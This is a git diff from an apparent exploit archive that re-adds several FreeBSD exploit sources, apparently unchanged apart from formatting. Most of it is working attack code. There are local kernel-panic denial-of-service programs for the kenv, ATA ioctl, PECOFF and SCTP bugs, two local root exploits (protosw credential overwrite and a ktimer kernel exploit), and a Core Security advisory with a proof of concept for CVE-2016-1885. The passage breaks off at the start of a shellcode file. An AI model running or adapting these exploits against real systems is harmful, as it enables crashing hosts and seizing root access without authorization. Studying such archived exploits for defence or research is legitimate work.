Errata Notice 09:01 -http://security.freebsd.org/advisories/FreeBSD-EN-09:01.kenv.asc, -kokanin@gmail */ -#include -#include -void main(){ -kenv(KENV_DUMP,NULL,123123123,123123123); -} - -// milw0rm.com [2009-03-23] +/* FreeBSD 7.x local kernel panic as mentioned in Errata Notice 09:01 +http://security.freebsd.org/advisories/FreeBSD-EN-09:01.kenv.asc, +kokanin@gmail */ +#include +#include +void main(){ +kenv(KENV_DUMP,NULL,123123123,123123123); +} + +// milw0rm.com [2009-03-23] diff --git a/platforms/freebsd/dos/9134.c b/platforms/freebsd/dos/9134.c index cbe81c7d7..6c94529a2 100755 --- a/platforms/freebsd/dos/9134.c +++ b/platforms/freebsd/dos/9134.c @@ -1,58 +1,58 @@ -/* atapanic.c - * - * by Shaun Colley, 13 July 2009 - * - * this panics the freebsd kernel by passing a large value to malloc(9) in one of - * fbsd's ata ioctl's. tested on freebsd 6.0 and 8.0. you need read access to the - * ata device in /dev to be able to open() the device. chain with some race condition - * bug? - * - * - shaun - * - */ - - -#include -#include -#include -#include - -struct ata_ioc_requestz { - union { - struct { - u_int8_t command; - u_int8_t feature; - u_int64_t lba; - u_int16_t count; - } ata; - struct { - char ccb[16]; - } atapi; - } u; - - caddr_t data; - int count; - int flags; - - int timeout; - int error; -}; - - -#define IOCATAREQUEST _IOWR('a', 100, struct ata_ioc_requestz) - -int main() { - -struct ata_ioc_requestz evil; -int fd; - -evil.count = 0xffffffff; -fd = open("/dev/acd0", O_RDONLY); /* /dev/acd0 is one of my ata devices */ - -ioctl(fd, IOCATAREQUEST, &evil); - -/* should never reach here if kernel panics */ -return 0; -} - -// milw0rm.com [2009-07-13] +/* atapanic.c + * + * by Shaun Colley, 13 July 2009 + * + * this panics the freebsd kernel by passing a large value to malloc(9) in one of + * fbsd's ata ioctl's. tested on freebsd 6.0 and 8.0. you need read access to the + * ata device in /dev to be able to open() the device. chain with some race condition + * bug? + * + * - shaun + * + */ + + +#include +#include +#include +#include + +struct ata_ioc_requestz { + union { + struct { + u_int8_t command; + u_int8_t feature; + u_int64_t lba; + u_int16_t count; + } ata; + struct { + char ccb[16]; + } atapi; + } u; + + caddr_t data; + int count; + int flags; + + int timeout; + int error; +}; + + +#define IOCATAREQUEST _IOWR('a', 100, struct ata_ioc_requestz) + +int main() { + +struct ata_ioc_requestz evil; +int fd; + +evil.count = 0xffffffff; +fd = open("/dev/acd0", O_RDONLY); /* /dev/acd0 is one of my ata devices */ + +ioctl(fd, IOCATAREQUEST, &evil); + +/* should never reach here if kernel panics */ +return 0; +} + +// milw0rm.com [2009-07-13] diff --git a/platforms/freebsd/dos/9206.c b/platforms/freebsd/dos/9206.c index d44f9b53f..7eef0666d 100755 --- a/platforms/freebsd/dos/9206.c +++ b/platforms/freebsd/dos/9206.c @@ -1,41 +1,41 @@ -/* pecoff_panic.c - * - * by Shaun Colley, 20 July 2009 - * - * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader - * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`) - * - * panic(9) is in vm_fault due to a page fault. the panic seems to be caused in - * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just - * a DoS at the moment :) (ugly code btw) - * - * tested on freebsd 7.2-RELEASE - * - * - shaun - */ - -#include -#include -#include -#include - -int main() { -int i, fd; -system("rm -rf evilprog.exe; touch evilprog.exe"); -fd = open("evilprog.exe", O_WRONLY); -char buf[0x3a+2+0x04+4000]; -buf[0] = 'M'; -buf[1] = 'Z'; /* magic */ -for(i = 2; i<0x3c; i++) buf[i] = 'a'; -buf[0x3c] = 0xee; -buf[0x3d] = 0xee; -buf[0x3e] = 0xee; -buf[0x3f] = 0xee; -for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61; -write(fd, buf, 0x3a+2+0x04+4000); -close(fd); -system("chmod 700 evilprog.exe"); -system("./evilprog.exe"); /* run the dodgy PECOFF binary */ -} - -// milw0rm.com [2009-07-20] +/* pecoff_panic.c + * + * by Shaun Colley, 20 July 2009 + * + * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader + * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`) + * + * panic(9) is in vm_fault due to a page fault. the panic seems to be caused in + * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just + * a DoS at the moment :) (ugly code btw) + * + * tested on freebsd 7.2-RELEASE + * + * - shaun + */ + +#include +#include +#include +#include + +int main() { +int i, fd; +system("rm -rf evilprog.exe; touch evilprog.exe"); +fd = open("evilprog.exe", O_WRONLY); +char buf[0x3a+2+0x04+4000]; +buf[0] = 'M'; +buf[1] = 'Z'; /* magic */ +for(i = 2; i<0x3c; i++) buf[i] = 'a'; +buf[0x3c] = 0xee; +buf[0x3d] = 0xee; +buf[0x3e] = 0xee; +buf[0x3f] = 0xee; +for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61; +write(fd, buf, 0x3a+2+0x04+4000); +close(fd); +system("chmod 700 evilprog.exe"); +system("./evilprog.exe"); /* run the dodgy PECOFF binary */ +} + +// milw0rm.com [2009-07-20] diff --git a/platforms/freebsd/dos/9373.c b/platforms/freebsd/dos/9373.c index d1e65f586..9e9c00497 100755 --- a/platforms/freebsd/dos/9373.c +++ b/platforms/freebsd/dos/9373.c @@ -1,75 +1,75 @@ -/* fbsd-sctp-panic.c - * - * freebsd 7.2-RELEASE SCTP local kernel DoS (kern panic) - * only tested on 7.2-RELEASE, probably older and newer builds are vuln. as well - * based on an unfixed bug found here: - * - * by Shaun Colley , Wed 05 Aug 2009 - * - * $ gcc fbsd-sctp-panic.c -o fbsd-sctp-panic && ./fbsd-sctp-panic - * wait a few seconds.. - * - * - shaun - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int csock, sock, lsock; - -void *accept_connection() { - struct sockaddr_in sin; - socklen_t size = sizeof(sin); - - sin.sin_family = AF_INET; - sin.sin_addr.s_addr = htonl(0x7f000001); - sin.sin_port = htons(1337); - - sock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); - bind(sock, (struct sockaddr *)&sin, sizeof(sin)); - listen(sock, 1); - lsock = accept(sock, (struct sockaddr *)&sin, &size); -} - -void recvdata() { - int flag; - struct sctp_sndrcvinfo recvinfo; - char buf[10]; - sctp_recvmsg(csock, buf, sizeof(buf), NULL, 0, &recvinfo, &flag); -} - -void make_connection() { - struct sockaddr_in consin; - struct sctp_sndrcvinfo sinfo; - - csock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); - consin.sin_family = AF_INET; - consin.sin_addr.s_addr = htonl(0x7f000001); - consin.sin_port = htons(1337); - - connect(csock, (struct sockaddr *)&consin, sizeof(consin)); - signal(SIGALRM, recvdata); - sinfo.sinfo_stream = 1337; - sctp_send(lsock, "pwned", sizeof("pwned"), &sinfo, 0); -} - - -int main() { - - alarm(2); - signal(SIGALRM, make_connection); - accept_connection(); - - return 0; -} - -// milw0rm.com [2009-08-06] +/* fbsd-sctp-panic.c + * + * freebsd 7.2-RELEASE SCTP local kernel DoS (kern panic) + * only tested on 7.2-RELEASE, probably older and newer builds are vuln. as well + * based on an unfixed bug found here: + * + * by Shaun Colley , Wed 05 Aug 2009 + * + * $ gcc fbsd-sctp-panic.c -o fbsd-sctp-panic && ./fbsd-sctp-panic + * wait a few seconds.. + * + * - shaun + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int csock, sock, lsock; + +void *accept_connection() { + struct sockaddr_in sin; + socklen_t size = sizeof(sin); + + sin.sin_family = AF_INET; + sin.sin_addr.s_addr = htonl(0x7f000001); + sin.sin_port = htons(1337); + + sock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); + bind(sock, (struct sockaddr *)&sin, sizeof(sin)); + listen(sock, 1); + lsock = accept(sock, (struct sockaddr *)&sin, &size); +} + +void recvdata() { + int flag; + struct sctp_sndrcvinfo recvinfo; + char buf[10]; + sctp_recvmsg(csock, buf, sizeof(buf), NULL, 0, &recvinfo, &flag); +} + +void make_connection() { + struct sockaddr_in consin; + struct sctp_sndrcvinfo sinfo; + + csock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); + consin.sin_family = AF_INET; + consin.sin_addr.s_addr = htonl(0x7f000001); + consin.sin_port = htons(1337); + + connect(csock, (struct sockaddr *)&consin, sizeof(consin)); + signal(SIGALRM, recvdata); + sinfo.sinfo_stream = 1337; + sctp_send(lsock, "pwned", sizeof("pwned"), &sinfo, 0); +} + + +int main() { + + alarm(2); + signal(SIGALRM, make_connection); + accept_connection(); + + return 0; +} + +// milw0rm.com [2009-08-06] diff --git a/platforms/freebsd/local/7581.c b/platforms/freebsd/local/7581.c index 7f6eca0af..6700784bb 100755 --- a/platforms/freebsd/local/7581.c +++ b/platforms/freebsd/local/7581.c @@ -1,144 +1,144 @@ -/* - * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability - * defined here: - * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc - * - * This will overwrite your credential structure in the kernel. This will - * affect more than just the exploit's process, which is why this doesn't - * spawn a shell. When the exploit has finished, your login shell should - * have euid=0. - * - * Enjoy, and happy holidays! - * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008 - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PAGES 1 -#define PATTERN1 0x8f8f8f8f -#define PATTERN2 0x6e6e6e6e - -typedef unsigned long ulong; -typedef unsigned char uchar; - -int -x(void) -{ - struct proc * p = (struct proc * )PATTERN1; - uint * i; - - while(1) - { - if(p->p_pid == PATTERN2) - { - i = (uint * )p->p_ucred; - *++i = 0; - break; - } - - p = p->p_list.le_next; - } - - return 1; -} - -int -main(int argc, char * argv[]) -{ - ulong addr; - uchar * c; - uchar * d; - uint * i; - void * v; - int pid; - int s; - - if(argc != 2) - { - fprintf(stderr, "usage: ./x \n"); - return 1; - } - - addr = strtoul(argv[1], 0, 0); - - v = mmap( - NULL, - (PAGES*PAGE_SIZE), - PROT_READ|PROT_WRITE|PROT_EXEC, - MAP_ANON|MAP_FIXED, - -1, - 0); - if(v == MAP_FAILED) - { - perror("mmap"); - return 0; - } - - c = v; - d = (uchar * )x; - while(1) - { - *c = *d; - if(*d == 0xc3) - { - break; - } - - d++; - c++; - } - - *c++ = 0xc3; - - c = v; - while(1) - { - if(*(long * )c == PATTERN1) - { - *(c + 0) = addr >> 0; - *(c + 1) = addr >> 8; - *(c + 2) = addr >> 16; - *(c + 3) = addr >> 24; - break; - } - c++; - } - - pid = getpid(); - while(1) - { - if(*(long * )c == PATTERN2) - { - *(c + 0) = pid >> 0; - *(c + 1) = pid >> 8; - *(c + 2) = pid >> 16; - *(c + 3) = pid >> 24; - break; - } - c++; - } - - s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); - if(s < 0) - { - perror("socket"); - return 1; - } - - shutdown(s, SHUT_RDWR); - - return 0; -} - -// milw0rm.com [2008-12-28] +/* + * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability + * defined here: + * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc + * + * This will overwrite your credential structure in the kernel. This will + * affect more than just the exploit's process, which is why this doesn't + * spawn a shell. When the exploit has finished, your login shell should + * have euid=0. + * + * Enjoy, and happy holidays! + * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008 + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PAGES 1 +#define PATTERN1 0x8f8f8f8f +#define PATTERN2 0x6e6e6e6e + +typedef unsigned long ulong; +typedef unsigned char uchar; + +int +x(void) +{ + struct proc * p = (struct proc * )PATTERN1; + uint * i; + + while(1) + { + if(p->p_pid == PATTERN2) + { + i = (uint * )p->p_ucred; + *++i = 0; + break; + } + + p = p->p_list.le_next; + } + + return 1; +} + +int +main(int argc, char * argv[]) +{ + ulong addr; + uchar * c; + uchar * d; + uint * i; + void * v; + int pid; + int s; + + if(argc != 2) + { + fprintf(stderr, "usage: ./x \n"); + return 1; + } + + addr = strtoul(argv[1], 0, 0); + + v = mmap( + NULL, + (PAGES*PAGE_SIZE), + PROT_READ|PROT_WRITE|PROT_EXEC, + MAP_ANON|MAP_FIXED, + -1, + 0); + if(v == MAP_FAILED) + { + perror("mmap"); + return 0; + } + + c = v; + d = (uchar * )x; + while(1) + { + *c = *d; + if(*d == 0xc3) + { + break; + } + + d++; + c++; + } + + *c++ = 0xc3; + + c = v; + while(1) + { + if(*(long * )c == PATTERN1) + { + *(c + 0) = addr >> 0; + *(c + 1) = addr >> 8; + *(c + 2) = addr >> 16; + *(c + 3) = addr >> 24; + break; + } + c++; + } + + pid = getpid(); + while(1) + { + if(*(long * )c == PATTERN2) + { + *(c + 0) = pid >> 0; + *(c + 1) = pid >> 8; + *(c + 2) = pid >> 16; + *(c + 3) = pid >> 24; + break; + } + c++; + } + + s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); + if(s < 0) + { + perror("socket"); + return 1; + } + + shutdown(s, SHUT_RDWR); + + return 0; +} + +// milw0rm.com [2008-12-28] diff --git a/platforms/freebsd/local/8261.c b/platforms/freebsd/local/8261.c index 04442f565..1672ef312 100755 --- a/platforms/freebsd/local/8261.c +++ b/platforms/freebsd/local/8261.c @@ -1,130 +1,130 @@ -/* bsd-ktimer.c - * - * Copyright (c) 2008 by - * - * - * FreeBSD >= 7.0 local kernel root exploit - * by christer/mu-b - Mon 2 June 2008 - * - * - Tested on: FreeBSD 7.0 - * FreeBSD 7.1 - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$! - */ - -#define _KERNEL - -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -#include -#include -#include -#include -#include - -#define ITPSIZE 0x08000000 -#define LOOKUP 0xD0000000 - -/* some prototypes to prevent compiler bitching */ -int ktimer_create(int, int, int *); -int ktimer_delete(int); -int kldsym(int, int, void *); - -static void -give_me_root() -{ - struct thread *thread; - asm("movl %%fs:0,%0": "=r"(thread)); - thread->td_proc->p_ucred->cr_uid=0; -} - -int -main (int argc, char **argv) -{ - struct itimer **itp_page, *it_page; - struct kld_sym_lookup ksym; - void *zpage[16]; - int i, r; - - printf ("FreeBSD local kernel root exploit\n" - "by: christer/mu-b\n" - "http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!\n\n"); - - itp_page = mmap (0, ITPSIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0); - if (itp_page < 0) - { - fprintf (stderr, "%s: failed to mmap %d-bytes\n", - argv[0], ITPSIZE); - exit (EXIT_FAILURE); - } - - printf ("* allocated pointer page: 0x%08X -> 0x%08X [%d-bytes]\n", - (int) itp_page, (int) itp_page + ITPSIZE, ITPSIZE); - - it_page = mmap (itp_page + ITPSIZE, sizeof (struct itimer), - PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0); - if (it_page < 0) - { - fprintf (stderr, "%s: failed to mmap %d-bytes\n", - argv[0], sizeof (struct itimer)); - exit (EXIT_FAILURE); - } - - printf ("* allocated itimer struct: 0x%08X -> 0x%08X [%d-bytes]\n", - (int) it_page, (int) it_page + sizeof (struct itimer), sizeof (struct itimer)); - - printf ("* filling pointer page... "); - fflush (stdout); - - for (i = 0; i < ITPSIZE / sizeof (struct itimer *); i++) - itp_page[i] = it_page; - printf ("done\n"); - - ksym.version = sizeof(ksym); - ksym.symname = "posix_clocks"; - - if (kldsym(0,KLDSYM_LOOKUP,&ksym) < 0) - { - fprintf (stderr, "%s: failed to lookup posix_clocks\n", argv[0]); - exit (EXIT_FAILURE); - } - - printf("* found posix_clocks @ [0x%x]\n",(unsigned )ksym.symvalue); - - for (i = 0; i < 16; i++) - zpage[i] = (void *) give_me_root; - - memset (it_page, 0, sizeof (struct itimer)); - /* DIRTY REPLACE WITH EXACT STRUCTURE MEMBER */ - for (i = 0; i < 10; i++) - ((unsigned int *) it_page)[i] = 4; - - it_page->it_flags = 0x00; - it_page->it_usecount = 0; - it_page->it_clockid = ((int) &zpage[8] - ksym.symvalue) / 20; - - printf ("* it_page->it_clockid: 0x%08X [access @0x%08X]\n", - it_page->it_clockid,(unsigned )&zpage[8]); - printf ("* ktimer_delete (0x%08X)\n", LOOKUP); - - sleep (2); - ktimer_create (0, 0, &i); - r = ktimer_delete (LOOKUP); - - printf ("* ktimer_delete: %d %d\n", r, it_page->it_flags); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2009-03-23] +/* bsd-ktimer.c + * + * Copyright (c) 2008 by + * + * + * FreeBSD >= 7.0 local kernel root exploit + * by christer/mu-b - Mon 2 June 2008 + * + * - Tested on: FreeBSD 7.0 + * FreeBSD 7.1 + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$! + */ + +#define _KERNEL + +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#define ITPSIZE 0x08000000 +#define LOOKUP 0xD0000000 + +/* some prototypes to prevent compiler bitching */ +int ktimer_create(int, int, int *); +int ktimer_delete(int); +int kldsym(int, int, void *); + +static void +give_me_root() +{ + struct thread *thread; + asm("movl %%fs:0,%0": "=r"(thread)); + thread->td_proc->p_ucred->cr_uid=0; +} + +int +main (int argc, char **argv) +{ + struct itimer **itp_page, *it_page; + struct kld_sym_lookup ksym; + void *zpage[16]; + int i, r; + + printf ("FreeBSD local kernel root exploit\n" + "by: christer/mu-b\n" + "http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!\n\n"); + + itp_page = mmap (0, ITPSIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0); + if (itp_page < 0) + { + fprintf (stderr, "%s: failed to mmap %d-bytes\n", + argv[0], ITPSIZE); + exit (EXIT_FAILURE); + } + + printf ("* allocated pointer page: 0x%08X -> 0x%08X [%d-bytes]\n", + (int) itp_page, (int) itp_page + ITPSIZE, ITPSIZE); + + it_page = mmap (itp_page + ITPSIZE, sizeof (struct itimer), + PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0); + if (it_page < 0) + { + fprintf (stderr, "%s: failed to mmap %d-bytes\n", + argv[0], sizeof (struct itimer)); + exit (EXIT_FAILURE); + } + + printf ("* allocated itimer struct: 0x%08X -> 0x%08X [%d-bytes]\n", + (int) it_page, (int) it_page + sizeof (struct itimer), sizeof (struct itimer)); + + printf ("* filling pointer page... "); + fflush (stdout); + + for (i = 0; i < ITPSIZE / sizeof (struct itimer *); i++) + itp_page[i] = it_page; + printf ("done\n"); + + ksym.version = sizeof(ksym); + ksym.symname = "posix_clocks"; + + if (kldsym(0,KLDSYM_LOOKUP,&ksym) < 0) + { + fprintf (stderr, "%s: failed to lookup posix_clocks\n", argv[0]); + exit (EXIT_FAILURE); + } + + printf("* found posix_clocks @ [0x%x]\n",(unsigned )ksym.symvalue); + + for (i = 0; i < 16; i++) + zpage[i] = (void *) give_me_root; + + memset (it_page, 0, sizeof (struct itimer)); + /* DIRTY REPLACE WITH EXACT STRUCTURE MEMBER */ + for (i = 0; i < 10; i++) + ((unsigned int *) it_page)[i] = 4; + + it_page->it_flags = 0x00; + it_page->it_usecount = 0; + it_page->it_clockid = ((int) &zpage[8] - ksym.symvalue) / 20; + + printf ("* it_page->it_clockid: 0x%08X [access @0x%08X]\n", + it_page->it_clockid,(unsigned )&zpage[8]); + printf ("* ktimer_delete (0x%08X)\n", LOOKUP); + + sleep (2); + ktimer_create (0, 0, &i); + r = ktimer_delete (LOOKUP); + + printf ("* ktimer_delete: %d %d\n", r, it_page->it_flags); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2009-03-23] diff --git a/platforms/freebsd_x86-64/dos/39570.c b/platforms/freebsd_x86-64/dos/39570.c new file mode 100755 index 000000000..7598103c6 --- /dev/null +++ b/platforms/freebsd_x86-64/dos/39570.c @@ -0,0 +1,227 @@ +/* + +1. Advisory Information + +Title: FreeBSD Kernel amd64_set_ldt Heap Overflow +Advisory ID: CORE-2016-0005 +Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64_set_ldt-heap-overflow +Date published: 2016-03-16 +Date of last update: 2016-03-14 +Vendors contacted: FreeBSD +Release mode: Coordinated release + +2. Vulnerability Information + +Class: Unsigned to Signed Conversion Error [CWE-196] +Impact: Denial of service +Remotely Exploitable: No +Locally Exploitable: Yes +CVE Name: CVE-2016-1885 + + + +3. Vulnerability Description + +FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices. + +An integer signedness error has been found in the amd64_set_ldt() function in the FreeBSD kernel code (defined in the /sys/amd64/amd64/sys_machdep.c file), which implements the i386_set_ldt system call on the amd64 version of the OS. This integer signedness issue ultimately leads to a heap overflow in the kernel, allowing local unprivileged attackers to crash the system. + +4. Vulnerable packages + +FreeBSD 10.2 amd64. +Other amd64 versions may be affected too but they were no checked. +5. Non-vulnerable packages + +FreeBSD 10.2-RELENG. +6. Vendor Information, Solutions and Workarounds + +The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.2-RELENG. + +7. Credits + +This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team. + + + +8. Technical Description / Proof of Concept Code + +8.1. FreeBSD amd64_set_ldt Integer Signedness Vulnerability + +[CVE-2016-1885] FreeBSD exposes the i386_set_ldt[1] architecture-dependent system call for its Intel i386 version. This system call can be used to manage i386 per-process Local Descriptor Table (LDT) entries. The amd64 version of FreeBSD still exposes this system call for 32-bit applications running on the 64-bit version of the OS. + +Architecture-specific system calls are handled by the FreeBSD kernel in the sysarch() function, which is defined in the /sys/amd64/amd64/sys_machdep.c[2] file: + +int +sysarch(td, uap) + struct thread *td; + register struct sysarch_args *uap; +{ +[...] +if (uap->op == I386_GET_LDT || uap->op == I386_SET_LDT) + return (sysarch_ldt(td, uap, UIO_USERSPACE)); +[...] + +As we can see in the code snippet above, if the system call being invoked is either I386_GET_LDT or I386_SET_LDT, then the sysarch_ldt() function is called. The following code excerpt shows the part of the sysarch_ldt() function that is in charge of handling the I386_SET_LDT syscall: + +int +sysarch_ldt(struct thread *td, struct sysarch_args *uap, int uap_space) +{ +struct i386_ldt_args *largs, la; +struct user_segment_descriptor *lp; +[...] +switch (uap->op) { + [...] + case I386_SET_LDT: + if (largs->descs != NULL && largs->num > max_ldt_segment) + return (EINVAL); + set_pcb_flags(td->td_pcb, PCB_FULL_IRET); + if (largs->descs != NULL) { + lp = malloc(largs->num * sizeof(struct + user_segment_descriptor), M_TEMP, M_WAITOK); + error = copyin(largs->descs, lp, largs->num * + sizeof(struct user_segment_descriptor)); + if (error == 0) + error = amd64_set_ldt(td, largs, lp); + free(lp, M_TEMP); + } else { + error = amd64_set_ldt(td, largs, NULL); + } + break; + +The largs variable that can be seen there is a pointer to an i386_ldt_args structure, which is defined as follows in the /sys/x86/include/sysarch.h[3] file: + +struct i386_ldt_args { + unsigned int start; + union descriptor *descs; + unsigned int num; +}; + +Note that all of the fields of the i386_ldt_args structure are fully user-controlled: they match the 3 arguments specified by the user when i386_set_ldt() was called from user mode: + +int i386_set_ldt(int start_sel, union descriptor *descs, int num_sels); + +From the sysarch_ldt() snippet above we can see that if we call i386_set_ldt() from user mode specifying a NULL pointer as the second argument (largs->descs), then it will end up calling the amd64_set_ldt() function, passing the largs variable as the second argument, and a NULL pointer as the third argument. This is the prototype of the amd64_set_ldt() function being called: + +int +amd64_set_ldt(struct thread *td, struct i386_ldt_args *uap, struct user_segment_descriptor *descs); + +amd64_set_ldt() is the vulnerable function here. Since it is being called with its third argument (the descs pointer) set to NULL, the following code path will be executed (remember that every field in the i386_ldt_args structure pointed by the uap pointer is fully controlled from user mode): + + int + amd64_set_ldt(td, uap, descs) + struct thread *td; + struct i386_ldt_args *uap; + struct user_segment_descriptor *descs; + { + [...] + int largest_ld; + [...] +608 if (descs == NULL) { +609 Free descriptors +610 if (uap->start == 0 && uap->num == 0) +611 uap->num = max_ldt_segment; +612 if (uap->num == 0) +613 return (EINVAL); +614 if ((pldt = mdp->md_ldt) == NULL || +615 uap->start >= max_ldt_segment) +616 return (0); +617 largest_ld = uap->start + uap->num; +618 if (largest_ld > max_ldt_segment) +619 largest_ld = max_ldt_segment; +620 i = largest_ld - uap->start; +621 mtx_lock(&dt_lock); +622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base)) +623 [uap->start], sizeof(struct user_segment_descriptor) * i); +624 mtx_unlock(&dt_lock); +625 return (0); +626 } + +The two if statements at lines 610 and 612 perform some sanity checks against uap->start and uap->num, which can be avoided by setting uap->num to a value different than 0. The next check at lines 614/615 will cause the function to exit early if the mdp->md_ldt pointer is NULL, or if uap->start is greater or equal than max_ldt_segment (1024). Having mdp->md_ldt holding a non-NULL value can be achieved by adding an initial entry to the process LDT before triggering the bug, like this: + + struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; + i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1); + +After passing those checks we reach the vulnerable code at lines 617-619: + +617 largest_ld = uap->start + uap->num; +618 if (largest_ld > max_ldt_segment) +619 largest_ld = max_ldt_segment; +620 i = largest_ld - uap->start; + +Note that largest_ld is a signed int that will hold the sum of uap->start + uap->num. The code at lines 618-619 tries to ensure that largest_ld is not greater than max_ldt_segment (1024); however, being largest_ld a signed integer holding a value fully controlled from user mode, it will perform a signed comparison that can be bypassed by setting uap->num to a negative number. + +This signedness error will ultimately lead to a heap overflow in the FreeBSD kernel when the bzero() function is later called with a huge value as its len parameter: + +622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base)) +623 [uap->start], sizeof(struct user_segment_descriptor) * i); + +8.2. Proof of Concept + +The following Proof-of-Concept code reproduces the vulnerability in a default FreeBSD 10.2-RELEASE-amd64 installation running a GENERIC kernel: + +*/ + +/* $ clang amd64_set_ldt.c -o amd64_set_ldt -m32 */ + +#include +#include +#include +#include +#include +#include + + +int main(int argc, char **argv){ + + int res; + + struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; + + printf("[+] Adding an initial entry to the process LDT...\n"); + res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1); + if (res < 0){ + err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)"); + } + printf("returned index: %d\n", res); + + printf("Triggering the bug...\n"); + res = i386_set_ldt(1, NULL, 0x80000000); +} + +/* + +9. Report Timeline + +2016-03-02: Core Security sent an initial notification to FreeBSD. +2016-03-02: FreeBSD confirmed reception of our email and requested we sent them a draft version of the advisory. +2016-03-02: Core Security sent FreeBSD a draft version of the advisory. We requested them to let us know once they finished reviewing the advisory in order to coordinate a publication date. +2016-03-11: Core Security asked FreeBSD if they were able to review and verify the reported issue. We additionally requested an estimated date for releasing the fix/update. +2016-03-11: FreeBSD informed us they were going to release the update in the middle of the following week. +2016-03-11: Core Security asked FreeBSD if they had the specific date and time they were going to release the update. We additionally requested a CVE identifier for the vulnerability considering they are registered as a CNA. +2016-03-11: FreeBSD informed us they would probably release it on Wednesday 16th of March and that they assigned the CVE-2016-1885 ID. +2016-03-16: Advisory CORE-2016-0005 published. +10. References + +[1] https://www.freebsd.org/cgi/man.cgi?query=i386_set_ldt&sektion=2&manpath=FreeBSD+8.2-RELEASE +[2] https://svnweb.freebsd.org/base/release/10.2.0/sys/amd64/amd64/sys_machdep.c?view=markup +[3] https://svnweb.freebsd.org/base/release/10.2.0/sys/x86/include/sysarch.h?view=markup + +11. About CoreLabs + +CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. + +12. About Core Security Technologies + +Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. + +Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. + +13. Disclaimer + +The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ + +14. PGP/GPG Keys + +This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. + +*/ \ No newline at end of file diff --git a/platforms/freebsd_x86-64/shellcode/13279.c b/platforms/freebsd_x86-64/shellcode/13279.c index 07a005fd5..14536a484 100755 --- a/platforms/freebsd_x86-64/shellcode/13279.c +++ b/platforms/freebsd_x86-64/shellcode/13279.c @@ -1,56 +1,56 @@ -/** - * - * _ _ _ ____ _ _ - * | | | | __ _ ___| | ___ __ | _ \ ___ | | | - * | |_| |/ _` |/ __| |/ / '_ \ | |_) / _ \| | | - * | _ | (_| | (__| <| | | | | _ < (_) | | | - * |_| |_|\__,_|\___|_|\_\_| |_| |_| \_\___/|_|_| - * [ http://www.hacknroll.com ] - * - * Description: - * FreeBSD x86-64 